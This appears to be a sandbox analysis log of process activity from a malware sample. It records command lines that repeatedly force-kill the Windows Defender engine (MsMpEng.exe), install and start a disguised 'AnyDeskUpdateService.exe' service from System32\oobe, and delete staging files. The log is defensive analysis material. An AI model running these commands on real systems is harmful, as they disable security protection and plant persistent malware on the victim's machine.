Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc start MicrosoftWindowsDefenderCoreService
Imagebase:0x7ff684ff0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:20:26:15
Start date:28/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:44
                                                                                                    Start time:20:26:15
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:45
                                                                                                    Start time:20:26:15
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:46
                                                                                                    Start time:20:26:15
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:47
                                                                                                    Start time:20:26:15
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:48
                                                                                                    Start time:20:26:15
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:49
                                                                                                    Start time:20:26:16
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:50
                                                                                                    Start time:20:26:16
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:51
                                                                                                    Start time:20:26:16
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\AnyDeskUpdateService.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff71dd80000
                                                                                                    File size:161'792 bytes
                                                                                                    MD5 hash:95408095927F78DEFFAEB9CB1F4CD44D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:52
                                                                                                    Start time:20:26:16
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:53
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:54
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:55
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:56
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:57
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:58
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:59
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:60
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff7403e0000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:61
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:62
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:63
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:64
                                                                                                    Start time:20:26:21
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:65
                                                                                                    Start time:20:26:21
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:66
                                                                                                    Start time:20:26:21
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:67
                                                                                                    Start time:20:26:21
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:68
                                                                                                    Start time:20:26:21
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:69
                                                                                                    Start time:20:26:21
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:70
                                                                                                    Start time:20:26:23
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:71
                                                                                                    Start time:20:26:23
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:72
                                                                                                    Start time:20:26:23
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\AnyDeskUpdateService.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff71dd80000
                                                                                                    File size:161'792 bytes
                                                                                                    MD5 hash:95408095927F78DEFFAEB9CB1F4CD44D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:73
                                                                                                    Start time:20:26:23
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:74
                                                                                                    Start time:20:26:24
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff799c70000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:75
                                                                                                    Start time:20:26:24
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:76
                                                                                                    Start time:20:26:24
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:77
                                                                                                    Start time:20:26:24
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:78
                                                                                                    Start time:20:26:24
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 79
Start time: 20:26:24
Start date: 28/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Imagebase: 0x7ff61e120000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 80
Start time: 20:26:24
Start date: 28/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 81
Start time: 20:26:24
Start date: 28/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Imagebase: 0x7ff61e120000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 82
Start time: 20:26:24
Start date: 28/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 83
Start time: 20:26:24
Start date: 28/09/2024
Path: C:\Windows\System32\taskkill.exe
Wow64 process (32bit): false
Commandline: taskkill /f /im MsMpEng.exe
Imagebase: 0x7ff6c7a10000
File size: 101'376 bytes
MD5 hash: A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 84
Start time: 20:26:24
Start date: 28/09/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: sc start MicrosoftWindowsDefenderCoreService
Imagebase: 0x7ff7934f0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 85
Start time: 20:26:27
Start date: 28/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Imagebase: 0x7ff61e120000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 86
Start time: 20:26:27
Start date: 28/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 87
Start time: 20:26:27
Start date: 28/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Imagebase: 0x7ff61e120000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 88
Start time: 20:26:28
Start date: 28/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 89
Start time: 20:26:28
Start date: 28/09/2024
Path: C:\Windows\System32\taskkill.exe
Wow64 process (32bit): false
Commandline: taskkill /f /im MsMpEng.exe
Imagebase: 0x7ff6c7a10000
File size: 101'376 bytes
MD5 hash: A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 90
Start time: 20:26:28
Start date: 28/09/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: sc start MicrosoftWindowsDefenderCoreService
Imagebase: 0x7ff684ff0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 91
Start time: 20:26:30
Start date: 28/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Imagebase: 0x7ff61e120000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 92
Start time: 20:26:30
Start date: 28/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 93
Start time: 20:26:30
Start date: 28/09/2024
Path: C:\Windows\System32\oobe\AnyDeskUpdateService.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Imagebase: 0x7ff71dd80000
File size: 161'792 bytes
MD5 hash: 95408095927F78DEFFAEB9CB1F4CD44D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 94
Start time: 20:26:30
Start date: 28/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Imagebase: 0x7ff61e120000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 95
Start time: 20:26:30
Start date: 28/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Imagebase: 0x7ff61e120000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 96
Start time: 20:26:31
Start date: 28/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Imagebase: 0x7ff61e120000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 97
Start time: 20:26:31
Start date: 28/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 98
Start time: 20:26:31
Start date: 28/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 99
Start time: 20:26:31
Start date: 28/09/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: sc start AnyDeskUpdateService
Imagebase: 0x7ff684ff0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
